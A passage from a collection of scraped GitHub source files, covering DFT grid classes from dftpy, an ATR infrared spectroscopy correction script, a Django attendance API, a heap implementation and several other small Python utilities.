np.einsum(\"lijk,lijk->ijk\", self.r, self.r)\n # self._rr = np.reshape(rr, [self.nr[0], self.nr[1], self.nr[2], 1])\n self._rr = rr\n return self._rr\n\n @property\n def s(self):\n if self._s is None:\n self._calc_grid_crys_points()\n return self._s\n\n @property\n def full(self):\n return self._full\n\n @full.setter\n def full(self, value):\n if self._full != value :\n '''\n Clean stored information of reciprocal grid.\n '''\n self._full = value\n self.RPgrid = None\n self._nrG = self.nr.copy()\n if not self._full:\n self._nrG[-1] = self._nrG[-1] // 2 + 1\n\n def get_reciprocal(self, scale=None, convention: str = \"physics\") -> 'ReciprocalGrid':\n r\"\"\"\n Returns a new ReciprocalCell, the reciprocal cell of self\n The ReciprocalCell is scaled properly to include\n the scaled (*self.nr) reciprocal grid points\n -----------------------------\n Note1: We need to use the 'physics' convention where bg^T = 2 \\pi * at^{-1}\n physics convention defines the reciprocal lattice to be\n exp^{i G \\cdot R} = 1\n Now we have the following \"crystallographer's\" definition ('crystallograph')\n which comes from defining the reciprocal lattice to be\n e^{2\\pi i G \\cdot R} =1\n In this case bg^T = at^{-1}\n -----------------------------\n Note2: We have to use 'Bohr' units to avoid changing hbar value\n \"\"\"\n # TODO define in constants module hbar value for all units allowed\n if self.RPgrid is None or scale is not None:\n if scale is None :\n scale=[1.0, 1.0, 1.0]\n scale = np.array(scale)\n fac = 1.0\n if convention == \"physics\" or convention == \"p\":\n fac = 2 * np.pi\n fac = 2 * np.pi\n bg = fac * np.linalg.inv(self.lattice)\n bg = bg.T\n reciprocal_lat = np.einsum(\"ij,i->ij\", bg, scale)\n\n self.RPgrid = ReciprocalGrid(lattice=reciprocal_lat, nr=self.nrR, full=self.full, uppergrid=self,\n cplx=self.cplx, mp=self.mp, ecut = self.ecut)\n return self.RPgrid\n\n def get_Rtable(self, rcut=10):\n '''Only support for serial'''\n if self._Rtable is None:\n self._Rtable = {}\n metric = np.dot(self.lattice, self.lattice.T)\n latticeConstants = np.sqrt(np.diag(metric))\n gaps = latticeConstants / self.nr\n Nmax = np.ceil(rcut / gaps).astype(np.int32) + 1\n # print('lc', latticeConstants)\n # print('gaps', gaps)\n # print(Nmax)\n # mgrid = np.mgrid[0:Nmax[0], 0:Nmax[0], 0:Nmax[0]].reshape((3, -1))\n # array = np.einsum('jk,ij->ik',gridpos,self.lattice)\n # dists = np.einsum('ij,ij->j', array, array)\n # index = np.arange(0, Nmax[0] * Nmax[1] * Nmax[2]).reshape(Nmax)\n # mgrid = np.mgrid[0:Nmax[0], 0:Nmax[1], 0:Nmax[2]].astype(np.float64)\n mgrid = np.mgrid[1 - Nmax[0] : Nmax[0], 1 - Nmax[1] : Nmax[1], 1 - Nmax[2] : Nmax[2]].astype(np.float64)\n mgrid[0] /= self.nr[0]\n mgrid[1] /= self.nr[1]\n mgrid[2] /= self.nr[2]\n gridpos = mgrid.astype(np.float64)\n array = np.einsum(\"jklm,ji->iklm\", gridpos, self.lattice)\n dists = np.sqrt(np.einsum(\"ijkl,ijkl->jkl\", array, array))\n self._Rtable[\"Nmax\"] = Nmax\n self._Rtable[\"table\"] = dists\n return self._Rtable\n\n def gather(self, data, out = None, **kwargs):\n value = super().gather(data, self.nrR, out = out, **kwargs)\n return value\n\n def get_array_mask(self, xyz):\n if self.mp.comm.size == 1: return slice(None)\n offsets = self.offsets.reshape((3, 1))\n nr = self.nr\n # -----------------------------------------------------------------------\n xyz -= offsets\n mask = np.logical_and(xyz[0] > -1, xyz[0] < nr[0])\n mask1 = np.logical_and(xyz[1] > -1, xyz[1] < nr[1])\n np.logical_and(mask, mask1, out=mask)\n np.logical_and(xyz[2] > -1, xyz[2] < nr[2], out=mask1)\n np.logical_and(mask, mask1, out=mask)\n # -----------------------------------------------------------------------\n return mask\n\n def guess_ecut(self):\n spacings2 = self.cell.lengths() / (self._nrR - 1)\n spacings = 0.5*(self.spacings + spacings2)\n return spacing2ecut(spacings.max())\n\nclass ReciprocalGrid(BaseGrid):\n \"\"\"\n Attributes:\n ----------\n All of BaseGrid and DirectCell\n\n g : coordinates of each point in the reciprocal cell\n\n gg : square of each g vector\n \"\"\"\n\n def __init__(self, lattice, nr = None, origin=np.array([0.0, 0.0, 0.0]), full=True, uppergrid=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n lattice : array_like[3,3]\n matrix containing the direct lattice vectors (as its colums)\n \"\"\"\n self.init_options = locals()\n for k in ['__class__', 'self', 'kwargs', 'uppergrid'] :\n self.init_options.pop(k, None)\n self.init_options.update(kwargs)\n super().__init__(lattice=lattice, nr=nr, origin=origin, full=full, direct=False, **kwargs)\n self._g = None\n self._gg = None\n self.Dgrid = uppergrid\n self._q = None\n self._mask = None\n self._gF = None\n self._ggF = None\n self._invgg = None\n self._invq = None\n self._gmask = None\n\n def __eq__(self, other):\n \"\"\"\n Implement the == operator in the ReciprocalGrid class.\n Refer to the __eq__ method of Grid for more information.\n \"\"\"\n if not isinstance(other, ReciprocalGrid):\n raise TypeError(\"You can only compare a ReciprocalGrid with another ReciprocalGrid\")\n return BaseGrid.__eq__(self, other)\n\n @property\n def g(self):\n if self._g is None:\n self._g = self._calc_grid_points()\n return self._g\n\n @property\n def q(self):\n if self._q is None:\n self._q = np.sqrt(self.gg)\n return self._q\n\n @property\n def gg(self):\n if self._gg is None:\n if self._g is None:\n self._g = self._calc_grid_points()\n gg = np.einsum(\"lijk,lijk->ijk\", self._g, self._g)\n self._gg = gg\n return self._gg\n\n @property\n def invgg(self):\n if self._invgg is None:\n if self.mp.is_root :\n self.gg[0, 0, 0] = 1.0\n invgg = 1.0/self.gg\n if self.mp.is_root :\n self.gg[0, 0, 0] = 0.0\n invgg[0, 0, 0] = 0.0\n self._invgg = invgg\n return self._invgg\n\n @property\n def invq(self):\n if self._invq is None:\n if self.mp.is_root :\n self.q[0, 0, 0] = 1.0\n invq = 1.0/self.q\n if self.mp.is_root :\n self.q[0, 0, 0] = 0.0\n invq[0, 0, 0] = 0.0\n self._invq = invq\n return self._invq\n\n def get_direct(self, scale= None, convention=\"physics\"):\n r\"\"\"\n Returns a new DirectCell, the direct cell of self\n The DirectCell is scaled properly to include\n the scaled (*self.nr) reciprocal grid points\n -----------------------------\n Note1: We need to use the 'physics' convention where bg^T = 2 \\pi * at^{-1}\n physics convention defines the reciprocal lattice to be\n exp^{i G \\cdot R} = 1\n Now we have the following \"crystallographer's\" definition ('crystallograph')\n which comes from defining the reciprocal lattice to be\n e^{2\\pi i G \\cdot R} =1\n In this case bg^T = at^{-1}\n -----------------------------\n \"\"\"\n # TODO define in constants module hbar value for all units allowed\n if self.Dgrid is None or scale is not None:\n if scale is None :\n scale=[1.0, 1.0, 1.0]\n scale = np.array(scale)\n fac = 1.0\n if convention == \"physics\" or convention == \"p\":\n fac = 1.0 / (2 * np.pi)\n at = np.linalg.inv(self.lattice.T * fac)\n direct_lat = np.einsum(\"ij,i->ij\", at, 1.0 / scale)\n self.Dgrid = DirectGrid(lattice=direct_lat, nr=self.nrR, full=self.full, uppergrid=self, cplx=self.cplx,\n mp=self.mp, ecut = self._ecut)\n return self.Dgrid\n\n def _calc_grid_points(self, full=None):\n ax = []\n for i in range(3):\n # use fftfreq function so we don't have to\n # worry about odd or even number of points\n # dd: this choice of \"spacing\" is due to the\n # definition of real and reciprocal space for\n # a grid (which is not exactly a conventional\n # lattice), specifically:\n # 1) the real-space points go from 0 to 1 in\n # crystal coords in n steps of length 1/n\n # 2) thus the reciprocal space (g-space)\n # crystal coords go from 0 to n in n steps\n # 3) the \"physicists\" 2*np.pi factor is\n # included in the definition of reciprocal\n # lattice vectors in the \"grid\" class and\n # is applied with s2r in going from crystal\n # to Cartesian g-space\n dd = 1 / self.nrR[i]\n if full is None:\n full = self.full\n if i == 2 and not full:\n ax.append(np.fft.rfftfreq(self.nrR[i], d=dd))\n else:\n freq = np.fft.fftfreq(self.nrR[i], d=dd)\n # if freq.size % 2 == 0 :\n # freq[freq.size//2] *= -1\n # ax.append(freq)\n # else :\n # ax.append(freq)\n ax.append(freq)\n AX = [a[sl] for a, sl in zip(ax, self.slice)]\n S = np.meshgrid(*AX, indexing=\"ij\")\n S_cart = np.asarray(S)\n S_cart = np.einsum(\"j...,jk->k...\", S_cart, self.lattice)\n\n return S_cart\n\n @property\n def mask_serial(self):\n if self._mask is None:\n nrR = self.nrR[:3]\n # Dnr = nr[:3]//2\n # Dmod = nr[:3]%2\n # mask = np.ones((nr[0], nr[1], Dnr[2]+1), dtype = bool)\n Dnr = nrR[:3] // 2\n Dmod = nrR[:3] % 2\n mask = np.ones(self.nr[:3], dtype=bool)\n if np.all(self.nr == self.nrR):\n mask[:, :, Dnr[2] + 1 :] = False\n\n mask[0, Dnr[1] + 1 :, 0] = False\n mask[Dnr[0] + 1 :, :, 0] = False\n if Dmod[2] == 0:\n mask[0, 0, Dnr[2]] = False\n mask[0, Dnr[1] + 1 :, Dnr[2]] = False\n mask[Dnr[0] + 1 :, :, Dnr[2]] = False\n if Dmod[1] == 0:\n mask[0, Dnr[1], Dnr[2]] = False\n if Dmod[0] == 0:\n mask[Dnr[0], 0, Dnr[2]] = False\n mask[Dnr[0], Dnr[1] + 1 :, Dnr[2]] = False\n if Dmod[0] == 0:\n mask[Dnr[0], Dnr[1] + 1 :, 0] = False\n if Dmod[1] == 0:\n mask[Dnr[0], Dnr[1], 0] = False\n if Dmod[1] == 0:\n mask[0, Dnr[1], 0] = False\n if all(Dmod == 0):\n mask[Dnr[0], Dnr[1], Dnr[2]] = False\n self._mask = mask\n return self._mask\n\n @property\n def mask(self):\n if self._mask is None:\n nrR = self.nrR[:3]\n Dnr = nrR[:3] // 2 - self.offsets\n mask = np.ones(self.nr[:3], dtype=bool)\n if np.all(self.nrG == self.nrR):\n if Dnr[2] >= 0:\n mask[:, :, Dnr[2] + 1 :] = False\n else:\n mask[:, :, :] = False\n Dnr = np.where(Dnr > 0, Dnr, 0)\n Dmod = nrR[:3] % 2\n if self.offsets[0] == self.offsets[2] == 0 :\n mask[0, Dnr[1] + 1 :, 0] = False\n if self.offsets[2] == 0 :\n mask[Dnr[0] + 1 :, :, 0] = False\n if Dmod[2] == 0:\n if self.offsets[0] == 0 :\n if self.offsets[1] == 0 :\n mask[0, 0, Dnr[2]:Dnr[2]+1] = False\n mask[0, Dnr[1] + 1 :, Dnr[2]:Dnr[2]+1] = False\n mask[Dnr[0] + 1 :, :, Dnr[2]:Dnr[2]+1] = False\n if Dmod[1] == 0 and self.offsets[0] == 0 :\n mask[0, Dnr[1]:Dnr[1]+1, Dnr[2]:Dnr[2]+1] = False\n if Dmod[0] == 0:\n if self.offsets[1] == 0 :\n mask[Dnr[0]:Dnr[0]+1, 0, Dnr[2]:Dnr[2]+1] = False\n mask[Dnr[0]:Dnr[0]+1, Dnr[1] + 1 :, Dnr[2]:Dnr[2]+1] = False\n if Dmod[0] == 0 and self.offsets[2] == 0 :\n mask[Dnr[0]:Dnr[0]+1, Dnr[1] + 1 :, 0] = False\n if Dmod[1] == 0:\n mask[Dnr[0]:Dnr[0]+1, Dnr[1]:Dnr[1]+1, 0] = False\n if Dmod[1] == 0 and self.offsets[2] == 0 :\n mask[0, Dnr[1]:Dnr[1]+1, 0] = False\n if all(Dmod == 0):\n mask[Dnr[0]:Dnr[0]+1, Dnr[1]:Dnr[1]+1, Dnr[2]:Dnr[2]+1] = False\n self._mask = mask\n return self._mask\n\n @property\n def gF(self):\n if self._gF is None:\n self._gF = self._calc_grid_points(full=True)\n return self._gF\n\n @property\n def ggF(self):\n if self._ggF is None:\n if self._gF is None:\n self._gF = self._calc_grid_points(full=True)\n ggF = np.einsum(\"lijk,lijk->ijk\", self._gF, self._gF)\n self._ggF = ggF\n return self._ggF\n\n @property\n def full(self):\n return self._full\n\n @full.setter\n def full(self, value):\n if self._full != value :\n self._full = value\n\n @property\n def g2max(self):\n return 2.0*self.ecut\n\n def get_gmask(self, g2max = None):\n if g2max is None : return self.gmask\n gmask = self.gg <= g2max\n return gmask\n\n @property\n def gmask(self):\n if self._gmask is None :\n self._gmask = self.get_gmask(self.g2max)\n return self._gmask\n\n\nclass RadialGrid(object):\n def __init__(self, r = None, v = None, direct = True, vr = None, **kwargs):\n self._r = r\n self._v = v\n self._vr = vr\n self._v_interp = None\n self.direct = direct\n\n @property\n def r(self):\n return self._r\n\n @r.setter\n def r(self, r):\n self._r = r\n\n @property\n def v(self):\n return self._v\n\n @v.setter\n def v(self, v):\n self._v = v\n\n @property\n def vr(self):\n return self._vr\n\n @property\n def v_interp(self):\n if self._v_interp is None :\n self._v_interp = splrep(self.r, self.v)\n return self._v_interp\n\n def to_3d_grid(self, dist, direct = None, out = None):\n if out is None :\n results = np.zeros_like(dist)\n else :\n results = out\n mask = dist < self._r[-1]\n if np.count_nonzero(mask) > 0 :\n results[mask] = splev(dist[mask], self.v_interp, der=0, ext=1)\n return results\n\n def _ft(self, x, method='simpson', comm=None, mp=None, **kwargs):\n v = self.v\n r = self.r\n if mp is None : mp = MP(comm = comm)\n vp = np.zeros_like(x)\n\n if method == 'simpson':\n from scipy.integrate import simps as integrate\n elif method == 'trapezoid':\n from scipy.integrate import trapz as integrate\n\n if self.vr :\n vr = v * r\n else :\n vr = v * r * r\n\n lb, ub = mp.split_number(len(x))\n\n for k in range(lb, ub):\n y = sp.spherical_jn(0, x[k] * r) * vr\n vp[k] = integrate(y, r)\n\n vp = mp.vsum(vp)\n\n return vp\n\n def ft(self, x, method='simpson', mp=None, **kwargs):\n y = self._ft(x, method=method, mp=mp, **kwargs)\n if self.direct :\n y *= (4.0 * np.pi)\n else :\n y *= (0.5 / np.pi ** 2)\n return y\n","repo_name":"shaoxc/dftpy","sub_path":"src/dftpy/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":27518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70024330455","text":"import numpy as np\nimport os\nimport cv2\nfrom skimage import color\n\ndef toInt8(img):\n info = normalize(img)\n data = 255 * info # Now scale by 255\n img2 = data.astype(np.uint8)\n return img2\ndef normalize(array):\n min_val = np.min(array)\n temp_val = array - min_val\n max_val = np.max(temp_val)\n if(max_val != 0):\n temp_val = temp_val / max_val\n return temp_val\ndef getDir(maindir,newdir):\n dir = os.path.join(maindir,newdir)\n if not os.path.exists(dir):\n os.makedirs(dir)\n return dir\ndef print_(img):\n print(np.max(img),np.min(img))\n\ndef loadAll(path):\n allFiles = []\n for r, d, f in os.walk(path):\n for file in f:\n allFiles.append(os.path.join(r, file))\n return allFiles\ndef bgrToLab(img):\n print(img.shape)\n m_rgb = img[..., ::-1]\n lab = color.rgb2lab(m_rgb)\n return lab","repo_name":"gcalazansdm/AMRObjectDetection","sub_path":"Utils/GeneralUtils.py","file_name":"GeneralUtils.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25455783655","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 31 10:59:40 2017\n\n@author: ania\n\"\"\"\nimport numpy as np\nfrom scipy import constants\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.metrics import r2_score\n\n\ndef kramers(k,wavenumbers_in):\n# k - imaginary part of refractive index\n# wavenumbers - in cm-1\n#\n# sorting data\n sort_ind=np.argsort(wavenumbers_in)\n wavenumbers=wavenumbers_in[sort_ind]\n# print(np.sum(np.abs(wavenumbers_in-wavenumbers[sort_ind])))\n k=k[sort_ind]\n# vector with dataspacing\n d_waven=wavenumbers[1:]-wavenumbers[0:-1]\n# vector for integration\n delta_waven=np.zeros(wavenumbers.shape)\n delta_waven[0:-1]=delta_waven[0:-1]+d_waven*0.5\n delta_waven[1:]=delta_waven[1:]+d_waven*0.5\n delta_waven[[0,-1]]=2*delta_waven[[0,-1]]\n# denominator\n mianownik=wavenumbers[:,None]**2 - wavenumbers[None,:]**2\n mianownik[np.diag_indices(wavenumbers.size)]=np.finfo(float).eps\n# matrix for integration along 0th dimension\n calka=(wavenumbers[:,None] * k[:,None] * delta_waven[:,None] )/mianownik\n calka[np.diag_indices(wavenumbers.size)]=0\n calka[np.isinf(calka)]=0\n# result - the refractive index\n# value 1.485 is the shift for toluene taken from \"Determination of infrared optical constants for single-component hydrocarbon fuels\"\n n=2/np.pi*np.nansum(calka,axis=0) + 1.485\n# rearranging back\n new_range=np.arange(wavenumbers.size)\n new_ind=new_range[sort_ind]\n return n[new_ind]\n \n \n\ndef abs_exact(n,k,wavenumbers,ncryst,angle,nrefl):\n theta=angle*np.pi/180\n n2=n+k*1j\n rs12= (ncryst*np.cos(theta) - 1j*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) ) / \\\n (ncryst*np.cos(theta) + 1j*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) )\n rp12= (ncryst**2 * np.cos(theta) - 1j*ncryst*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) ) / \\\n (ncryst**2 * np.cos(theta) + 1j*ncryst*np.sqrt(ncryst**2 * np.sin(theta)**2 - n2**2) ) \n Rs=(rs12 * rs12.conj()).real\n Rp=(rp12 * rp12.conj()).real\n R=0.5*(Rs**nrefl+Rp**nrefl)\n Aexact=-np.log10(R)\n return Aexact\n\ndef plotting(x,ys,filename):\n if type(ys) is not list:\n ys=[ys]\n plt.ioff()\n fig = plt.figure(figsize=(8,8*9/16))\n fig.add_subplot(111)\n colors=['k','b','r','g','m']\n colors=colors*(len(ys)//5) + colors[slice(len(ys)%5)]\n \n for y,color in zip(ys,colors):\n plt.plot(x,y/np.max(y),'-'+color) \n \n plt.savefig(os.path.splitext(filename)[0]+'.svg')\n plt.cla()\n plt.close('all')\n \n\ndef atr_exact(filename,ncryst=2.4,angle=45,nrefl=1,r2=1):\n \n widmo=np.genfromtxt(filename,delimiter=' ')\n Aexp=widmo[:,1]\n Aexp[Aexp==0]=np.finfo(float).eps\n wavenumbers=widmo[:,0]\n theta=angle*np.pi/180\n#==============================================================================\n# # initial guesses for n and k\n#==============================================================================\n n=1.5*np.ones(Aexp.shape)\n # k from approx formula\n k=Aexp * (ncryst**2-n**2) * np.sqrt(ncryst**2 * np.sin(theta)**2 - n**2) / (0.434 * 3/2 * 4 *n*ncryst*np.cos(theta))/nrefl\n n=kramers(k,wavenumbers)\n#==============================================================================\n# # atr signal from exact formulas\n#==============================================================================\n Aexact=abs_exact(n,k,wavenumbers,ncryst,angle,nrefl)\n cond = np.abs(1-r2_score(Aexp,Aexact))\n it=0\n while cond>0.01:\n # from approx formula from:\n # Milosevic, Milan. Internal reflection and ATR spectroscopy. Vol. 262. John Wiley & Sons, 2012.\n delta_A=Aexp-Aexact\n delta_k=delta_A*(ncryst**2-n**2) * np.sqrt(ncryst**2 * np.sin(theta)**2 - n**2) / (0.434 * 3/2 * 4 *n*ncryst*np.cos(theta)) / nrefl\n delta_k[np.isnan(delta_k)]=np.finfo(float).eps\n k=k+delta_k\n n=kramers(k,wavenumbers)\n Aexact=abs_exact(n,k,wavenumbers,ncryst,angle,nrefl)\n cond = np.abs(1-r2_score(Aexp,Aexact))\n it+=1\n print('=====exact ',it)\n\n#==============================================================================\n# # outputs \n#==============================================================================\n # this is not molar ext coefficient, but a value proportional to molar ext coeff\n molar_ext=k * wavenumbers\n plotting(wavenumbers,[Aexp,Aexact,molar_ext],filename)\n np.savetxt(os.path.splitext(filename)[0]+'_ref_ind.txt',np.concatenate( (wavenumbers[:,None],n[:,None]), axis=1) )\n np.savetxt(os.path.splitext(filename)[0]+'_molar_ext.txt',np.concatenate( (wavenumbers[:,None],molar_ext[:,None]), axis=1) )\n \n \n","repo_name":"akelm/atr_correction","sub_path":"atr.py","file_name":"atr.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70363400215","text":"#!/usr/bin/python3\n\"\"\"Module that creates a child class which inherits\nfrom class: Rectangle\n\"\"\"\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Defines a child class\"\"\"\n\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"Initialization\"\"\"\n self.size = size\n super().__init__(size, size, x, y, id)\n\n def __str__(self):\n \"\"\"Returns string\"\"\"\n name = str(\"[Square] \")\n i = str(self.id)\n x = str(self.x)\n y = str(self.y)\n w = str(self.width)\n return (name + \"(\" + i + \") \" + x + \"/\" + y + \" - \" + w)\n\n @property\n def size(self):\n return self.width\n\n @size.setter\n def size(self, size):\n self.width = size\n self.height = size\n\n def update(self, *args, **kwargs):\n \"\"\"Updates class with addition of attributes\n using args(ints) and kwargs(dict - key/value pair)\n \"\"\"\n count = 1\n if args and len(args):\n for arg in args:\n if count == 1:\n self.id = arg\n elif count == 2:\n self.size = arg\n elif count == 3:\n self.x = arg\n elif count == 4:\n self.y = arg\n count += 1\n\n else:\n for key, value in kwargs.items():\n if key == \"id\":\n self.id = value\n elif key == \"size\":\n self.size = value\n elif key == \"x\":\n self.x = value\n elif key == \"y\":\n self.y = value\n\n def to_dictionary(self):\n \"\"\"Returns dictionary representation of class\"\"\"\n return {\n \"id\": self.id,\n \"size\": self.size,\n \"x\": self.x,\n \"y\": self.y\n }\n","repo_name":"jubriltayo/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12718832723","text":"from pathlib import Path\n\n# Default GluonTS version for when the framework version is not specified.\n# This is no longer updated so as to not break existing workflows.\nGLUONTS_VERSION = \"0.4.1\"\n\n# Framework related\nFRAMEWORK_NAME = \"GluonTS\"\nLOWEST_MMS_VERSION = \"1.4\"\nLOWEST_SCRIPT_MODE_VERSION = \"0\", \"4\", \"1\"\nLATEST_GLUONTS_VERSION = \"0.4.1\"\nPYTHON_VERSION = \"py3\"\n\n# Training related\nENTRY_POINTS_FOLDER = Path(__file__).parent.resolve() / \"entry_point_scripts\"\nTRAIN_SCRIPT = \"train_entry_point.py\"\nMONITORED_METRICS = \"mean_wQuantileLoss\", \"ND\", \"RMSE\"\nNUM_SAMPLES = 100\nQUANTILES = 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9\n","repo_name":"awslabs/gluonts","sub_path":"src/gluonts/nursery/sagemaker_sdk/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":3904,"dataset":"github-code","pt":"67"} +{"seq_id":"37871392580","text":"import cloudinary\nimport cloudinary.uploader\nimport cloudinary.api\nimport uuid\n\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom attendance_app.apps.asistencia.models import Asistencia, Personal\nfrom attendance_app.apps.asistencia.serializers import SetAsistenciaSerializer, GetAsistenciaSerializer\n\nfrom datetime import date, datetime, timedelta\nfrom django.utils import timezone\nimport datetime as dt\nimport time\nfrom PIL import Image\nimport numpy as np\nimport face_recognition\nimport cv2\n\n\n@api_view(['GET', 'POST'])\ndef asistencia(request):\n if request.method == \"GET\":\n fecha = request.GET.get('fecha', '')\n\n fecha = datetime.today() if fecha == '' else datetime.strptime(fecha, '%d-%m-%Y')\n\n id_persona = int(request.GET.get('idPersona', '0'))\n\n if id_persona != 0:\n listado = Asistencia.objects.filter(creado__date=fecha.date(), personal_id=id_persona)\n else:\n listado = Asistencia.objects.filter(creado__date=fecha.date())\n\n serializer = GetAsistenciaSerializer(listado, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n elif request.method == 'POST':\n mensaje = False\n id_personal = int(request.GET.get('persona'))\n evento = 0\n\n file_in_memory = request.FILES['imagen']\n\n try:\n asistencias_persona = Asistencia.objects.filter(personal_id=id_personal, creado__date=date.today()).last()\n\n diferencia = abs(datetime.now() - asistencias_persona.creado)\n minutos = divmod(diferencia.seconds, 60)\n\n if minutos[0] > 10:\n\n if asistencias_persona.evento == 0:\n evento = 1\n mensaje = registrar_asistencia(id_personal, file_in_memory, evento)\n\n except:\n mensaje = registrar_asistencia(id_personal, file_in_memory, evento=evento)\n\n return Response({'mensaje': mensaje})\n\n\ndef guardar_imagen(file_in_memory):\n content_type = file_in_memory.content_type\n filename = str(uuid.uuid4()) + '.jpg'\n archivo = SimpleUploadedFile(filename, file_in_memory.read(), content_type)\n res = cloudinary.uploader.upload(archivo)\n return res['secure_url']\n\n\n@api_view(['GET'])\ndef asistencia_por_personal(request, id_personal):\n listado = Asistencia.objects.filter(personal_id=id_personal)\n asistencia_personal_serializer = GetAsistenciaSerializer(listado, many=True)\n\n return Response(asistencia_personal_serializer.data, status=status.HTTP_200_OK)\n\n\n@api_view(['GET'])\ndef asistencia_por_personal_rango(request, id_personal):\n fecha1 = request.GET.get('fecha1', '')\n fecha2 = request.GET.get('fecha2', '')\n\n fecha1 = datetime.strptime(fecha1, '%d-%m-%y')\n fecha2 = datetime.strptime(fecha2, '%d-%m-%y') + timedelta(days=1)\n\n listado = Asistencia.objects.filter(personal_id=id_personal, creado__rabge=[fecha1, fecha2])\n asistencia_personal_serializer = GetAsistenciaSerializer(listado, many=True)\n\n return Response(asistencia_personal_serializer.data, status=status.HTTP_200_OK)\n\n\ndef registrar_asistencia(id, image_file, evento):\n image_url = guardar_imagen(image_file)\n\n asistencia_data = {'personal': id, 'imagen': image_url, 'evento': evento, 'tipo_evento': tipo_evento()}\n\n asistencia_serializer = SetAsistenciaSerializer(data=asistencia_data)\n\n if asistencia_serializer.is_valid():\n asistencia_serializer.save()\n return True\n else:\n\n return asistencia_serializer.errors\n\n\ndef tipo_evento():\n hora = datetime.now().hour\n if hora < 12:\n return 0\n else:\n return 1\n","repo_name":"Gerardotr/attendance_app","sub_path":"attendance_app/apps/asistencia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10078823679","text":"class Heap(object):\n def __init__(self, values):\n self._values = []\n for value in values:\n self.sift_up(value)\n\n def __len__(self):\n return len(self._values)\n\n def sift_up(self, value):\n values = self._values\n values.append(value)\n index = len(self) - 1\n while index:\n i, j = (index - 1) // 2, index\n if values[i] > values[j]:\n values[i], values[j] = values[j], values[i]\n index = i\n else:\n break\n\n def pop(self):\n start = self._values[0]\n end = self._values.pop()\n if len(self):\n self._values[0] = end\n self.sift_down()\n return start\n\n def is_empty(self):\n return not bool(self._values)\n\n def sift_down(self):\n index = 0\n values = self._values\n while 2 * index + 1 < len(self) - 1:\n i, j = index, 2 * index + 1\n if j + 1 < len(self) and values[j + 1] < values[j]:\n j += 1\n if values[i] > values[j]:\n values[i], values[j] = values[j], values[i]\n index = j\n else:\n break\n\n\nif __name__ == \"__main__\":\n h = Heap([1, 5, 5, 2, 3, 8, 34, 12, 23, 4, 6, 7, 3])\n while not h.is_empty():\n print(h.pop(), end=' ')\n","repo_name":"zhjc1124/practice","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73486106452","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nfrom HyperionUtilities import HyperionDataset\nfrom HyperionUtilities import calcDetSignal\n#%%\nq = HyperionDataset(fname, channels = [1]); q.colorTempPlot()\n#%%\n#Temperature\nT = [21.4 , 20.5, 17.6, 14.3, 12.2, 11.0, 6.0, 1.1, 1.2, -14.0, -21.0, -27.0, -34.0, -42.0, -46.5,\n -51.0, -57.0, -61.6, -64.0, -72.4, -85.0, -121, -131.7, -148.0, -194.6, -186.4, -183.6, -170.3, -164.2,\n -153.3, -141.0, -128.6, -117.6, -107.8, -99.0, -91.1, -84.2, -77.2, -70.7, -64.5, -59.1, -54.1, -49.6, -45.2,\n -40.8, -36.8, -33.2, -30.0, -26.7, -23.7, -20.7, -17.3, -14.9, -11.4, -9.7, -6.8, -4.5, -2.2, -6.3,\n 1.9, 3.6, 5.1, 6.4, 7.5, 10.2, 11.6]\n#%%\n#Recorded time in (minutes, seconds)\nt_ms = [(0,0), (0,30), (0,50), (1,0), (2,20), (2,30), (2,50), (3,10), (3,40), (4,10), (4,30), (4,50), (5,10), (5,40), (6,0),\n (6,20), (6,40), (7,10), (7,30), (8,00), (9,20), (9,45), (10,0), (10,15), (10,30), (13,20), (13,40), (15,10), (16,00),\n (17,0), (18,0), (19,0), (20,0), (21,0), (22,0), (23,0), (24,0), (25,0), (26,0), (27,0), (28,0), (29,0), (30,0), (31,0),\n (32,0), (33,0), (34,0), (35,0), (36,0), (37,0), (38,0), (39,0), (40,0), (41,22), (42,0), (43,0), (44,0), (45,0), (46,0),\n (48,0), (49,0), (50,0), (51,0), (52,0), (55,0), (57,0)]\n#lambda function to convert minutes:seconds to 60*minutes + seconds\nms = lambda m,s: float(m)*60.0 + float(s)\nt = [ms(m,s) for (m,s) in t_ms]\n#%%\nplt.figure()\nplt.plot(t, T)#plot time vs Temp\n#%%\ntempFunc = interp1d(t, T, bounds_error=None, fill_value='extrapolate')\n#%%\n#hyperion data:\nfname = r\"C:\\Users\\dmeichle\\Documents\\Micron Optics\\ENLIGHT\\Data\\2020\\10\\Responses.20201021164957.txt\"\nq = HyperionDataset(fname)\n#%%\n# plt.figure()\n# dotRng = [1544,5553]\n# dots0 = np.dot(q.data[0,dotRng[0]:dotRng[1] 